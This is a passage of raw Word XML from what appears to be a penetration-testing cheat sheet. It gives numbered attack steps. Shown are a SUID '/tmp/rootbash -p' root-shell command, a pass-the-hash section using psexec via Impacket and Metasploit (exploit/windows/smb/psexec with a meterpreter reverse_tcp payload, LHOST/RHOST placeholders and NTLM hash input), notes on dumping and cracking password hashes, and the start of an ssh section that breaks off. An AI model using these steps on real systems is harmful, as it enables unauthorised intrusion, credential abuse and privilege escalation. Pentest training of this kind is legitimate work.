              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">/tmp/rootbash </w:t>
            </w:r>
            <w:r w:rsidRPr="00440F19">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E1AE7" w14:paraId="73B6F2FC" w14:textId="77777777" w:rsidTr="003E3BB6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="42C9FE11" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5A249828" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="48EE2965" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BDB39E5" w14:textId="77777777" w:rsidR="004B5F0D" w:rsidRDefault="004B5F0D"/>
    <w:p w14:paraId="49C1D059" w14:textId="77777777" w:rsidR="004B5F0D" w:rsidRDefault="004B5F0D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5376ED51" w14:textId="5237D5EA" w:rsidR="004B5F0D" w:rsidRDefault="004B5F0D" w:rsidP="004B5F0D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>psexec (impacket</w:t>
      </w:r>
      <w:r w:rsidR="00432310">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147B18BE" w14:textId="77777777" w:rsidR="004B5F0D" w:rsidRDefault="004B5F0D" w:rsidP="004B5F0D"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:tblpY="884"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2310"/>
        <w:gridCol w:w="8106"/>
      </w:tblGrid>
      <w:tr w:rsidR="004B5F0D" w14:paraId="3B36A3E0" w14:textId="77777777" w:rsidTr="00432310">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5170DC1B" w14:textId="008E147B" w:rsidR="004B5F0D" w:rsidRDefault="00E423AB" w:rsidP="006E3BDB">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="004B5F0D">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6DB56A82" w14:textId="77777777" w:rsidR="004B5F0D" w:rsidRDefault="00B53779" w:rsidP="006E3BDB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>psexec</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EA2305E" w14:textId="77777777" w:rsidR="00B53779" w:rsidRDefault="00B53779" w:rsidP="006E3BDB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3294E7FF" w14:textId="77777777" w:rsidR="00432310" w:rsidRDefault="00B53779" w:rsidP="006E3BDB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F411D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Must have Impacket unpacked and installed; check 1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>f</w:t>
            </w:r>
            <w:r w:rsidRPr="001F411D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> for more about getting impacket installed and ready)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FF343D3" w14:textId="77777777" w:rsidR="00432310" w:rsidRDefault="00432310" w:rsidP="006E3BDB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2807FD18" w14:textId="77777777" w:rsidR="00432310" w:rsidRDefault="00432310" w:rsidP="006E3BDB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="77DCE835" w14:textId="77777777" w:rsidR="00432310" w:rsidRDefault="00432310" w:rsidP="006E3BDB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58A775C5" w14:textId="77777777" w:rsidR="00432310" w:rsidRDefault="00432310" w:rsidP="006E3BDB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04029B78" w14:textId="70C535A2" w:rsidR="00B53779" w:rsidRPr="00B53779" w:rsidRDefault="00432310" w:rsidP="006E3BDB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
              <w:t>(Metasploit has in-built psexec module however already pre-installed in Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8106" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="731301BD" w14:textId="59AD0C5C" w:rsidR="004B5F0D" w:rsidRDefault="00B53779" w:rsidP="006E3BDB">
            <w:r>
              <w:t>If we gain a NTLM and/or LanMan hash of a user’s password we can use psexec.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B5F0D" w14:paraId="79A18249" w14:textId="77777777" w:rsidTr="00432310">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3A3997BA" w14:textId="5535DF44" w:rsidR="004B5F0D" w:rsidRDefault="00E423AB" w:rsidP="006E3BDB">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="004B5F0D">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4E7E7BC2" w14:textId="77777777" w:rsidR="004B5F0D" w:rsidRDefault="004B5F0D" w:rsidP="006E3BDB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8106" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="655E9C5D" w14:textId="1368DF63" w:rsidR="004B5F0D" w:rsidRDefault="00B53779" w:rsidP="006E3BDB">
            <w:r w:rsidRPr="00B53779">
              <w:t>The psexec module is often used by penetration testers to obtain access to a given system that you already know the credentials for. It was written by Sysinternals and has been integrated within the framework. Often as penetration testers, we successfully gain access to a system through some exploit, use meterpreter to grab the passwords or other methods like fgdump, pwdump, or cachedump and then use rainbowtables to crack those hash values.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B5F0D" w14:paraId="35ED4D93" w14:textId="77777777" w:rsidTr="00432310">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="441016F1" w14:textId="6B3EE6ED" w:rsidR="004B5F0D" w:rsidRDefault="00E423AB" w:rsidP="006E3BDB">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="004B5F0D">
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="384CEF19" w14:textId="77777777" w:rsidR="004B5F0D" w:rsidRDefault="004B5F0D" w:rsidP="006E3BDB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8106" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2B6E6985" w14:textId="6B58549A" w:rsidR="00B53779" w:rsidRDefault="00B53779" w:rsidP="00B53779">
            <w:r w:rsidRPr="00B53779">
              <w:t xml:space="preserve">One important thing to note on this is that if NTLM is only available (for example </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B53779">
              <w:t>its</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B53779">
              <w:t xml:space="preserve"> a 15+ character password or through GPO they specify NTLM response only), simply replace the ****NOPASSWORD**** with </w:t>
            </w:r>
            <w:r w:rsidRPr="00B53779">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r w:rsidRPr="00B53779">
              <w:t xml:space="preserve"> 0’s for example:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>******NOPASSWORD*******</w:t>
            </w:r>
            <w:r w:rsidRPr="00B53779">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:t>8846f7eaee8fb117ad06bdd830b7586c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46DE34D8" w14:textId="4D075D75" w:rsidR="00B53779" w:rsidRDefault="00B53779" w:rsidP="00B53779">
            <w:r>
              <w:t>Would be replaced by:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A7D59DC" w14:textId="36B27B4D" w:rsidR="00B53779" w:rsidRDefault="00B53779" w:rsidP="00B53779">
            <w:r>
              <w:tab/>
              <w:t>00000000000000000000000000000000</w:t>
            </w:r>
            <w:r w:rsidRPr="00B53779">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:t>8846f7eaee8fb117ad06bdd830b7586c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B5F0D" w14:paraId="0029823E" w14:textId="77777777" w:rsidTr="00432310">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6BC5D598" w14:textId="6A3F4B39" w:rsidR="004B5F0D" w:rsidRDefault="00E423AB" w:rsidP="006E3BDB">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="004B5F0D">
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1FA01637" w14:textId="77777777" w:rsidR="004B5F0D" w:rsidRDefault="004B5F0D" w:rsidP="006E3BDB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8106" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0C23B007" w14:textId="77777777" w:rsidR="004B5F0D" w:rsidRDefault="00B53779" w:rsidP="006E3BDB">
            <w:r>
              <w:t>Metasploit also has a psexec module built in, open msfconsole and use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00432310" w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>search</w:t>
            </w:r>
            <w:r w:rsidR="00432310">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00432310" w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>psexec</w:t>
            </w:r>
            <w:r w:rsidR="00432310">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00432310">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00432310" w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">use </w:t>
            </w:r>
            <w:r w:rsidR="00432310" w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>exploit/windows/smb/psexec</w:t>
            </w:r>
            <w:r w:rsidR="00432310">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00432310">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00432310" w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidR="00432310" w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>payload windows/meterpreter/reverse_tcp</w:t>
            </w:r>
            <w:r w:rsidR="00432310">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00432310">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00432310" w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidR="00432310" w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">LHOST </w:t>
            </w:r>
            <w:r w:rsidR="00432310" w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>LOCAL.INTER.FACE.IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA8C253" w14:textId="77777777" w:rsidR="00432310" w:rsidRDefault="00432310" w:rsidP="006E3BDB">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">LPORT </w:t>
            </w:r>
            <w:r w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>4444</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">RHOST </w:t>
            </w:r>
            <w:r w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B810855" w14:textId="163211BB" w:rsidR="00432310" w:rsidRDefault="00432310" w:rsidP="006E3BDB">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">SMBPass </w:t>
            </w:r>
            <w:r w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>HASH</w:t>
            </w:r>
            <w:r w:rsidR="00B91A10">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>(LM)</w:t>
            </w:r>
            <w:r w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>HASH</w:t>
            </w:r>
            <w:r w:rsidR="00B91A10">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">(NT)       </w:t>
            </w:r>
            <w:r>
              <w:t>(32 bits, colon, 32 bits of what the hash is)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00432310">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B5F0D" w14:paraId="603D2552" w14:textId="77777777" w:rsidTr="00432310">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1C5631E5" w14:textId="77777777" w:rsidR="004B5F0D" w:rsidRDefault="004B5F0D" w:rsidP="006E3BDB"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="31C4D02B" w14:textId="77777777" w:rsidR="004B5F0D" w:rsidRDefault="004B5F0D" w:rsidP="006E3BDB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8106" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6672E161" w14:textId="77777777" w:rsidR="004B5F0D" w:rsidRDefault="004B5F0D" w:rsidP="006E3BDB"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0246B11B" w14:textId="1448D937" w:rsidR="00BB6872" w:rsidRDefault="00BB6872">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D05077D" w14:textId="73A145BE" w:rsidR="00BB6872" w:rsidRDefault="00BB6872" w:rsidP="00BB6872">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009A029F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sh</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2A4790" w14:paraId="48F762E6" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="52C8D544" w14:textId="3BAA4E31" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00854B38">
            <w:r>
              <w:t>83.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="11B81975" w14:textId="36280F70" w:rsidR="002A4790" w:rsidRPr="009A029F" w:rsidRDefault="002A4790" w:rsidP="00854B38">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(ssh is installed on Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B4FE0D5" w14:textId="77777777" w:rsidR="002A4790" w:rsidRPr="009A029F" w:rsidRDefault="002A4790" w:rsidP="005F2BC6">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A029F">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS AN OPEN SSH PORT, USE SSH TO REMOTELY CONNECT, OTHERWISE SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1002DE27" w14:textId="11113BFB" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="005F2BC6">
            <w:r>
              <w:t>Secure Shell (ssh) is a remote administration protocol that allows users to control and modify their remote servers over the Internet (look for port 22/tcp).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2790A53E" w14:textId="7320095F" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="005F2BC6"/>
          <w:p w14:paraId="70D8D1D9" w14:textId="0370836D" w:rsidR="002A4790" w:rsidRPr="00BB6872" w:rsidRDefault="002A4790" w:rsidP="005F2BC6">
            <w:r>
              <w:t>Quite simply, ssh can be used by entering:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E160D7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E160D7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USERNAME</w:t>
            </w:r>
            <w:r w:rsidRPr="00F8582A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>@</w:t>
            </w:r>
            <w:r w:rsidRPr="00E160D7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E160D7">
              <w:t>(Can be ip or url domain name)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00961AF1">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
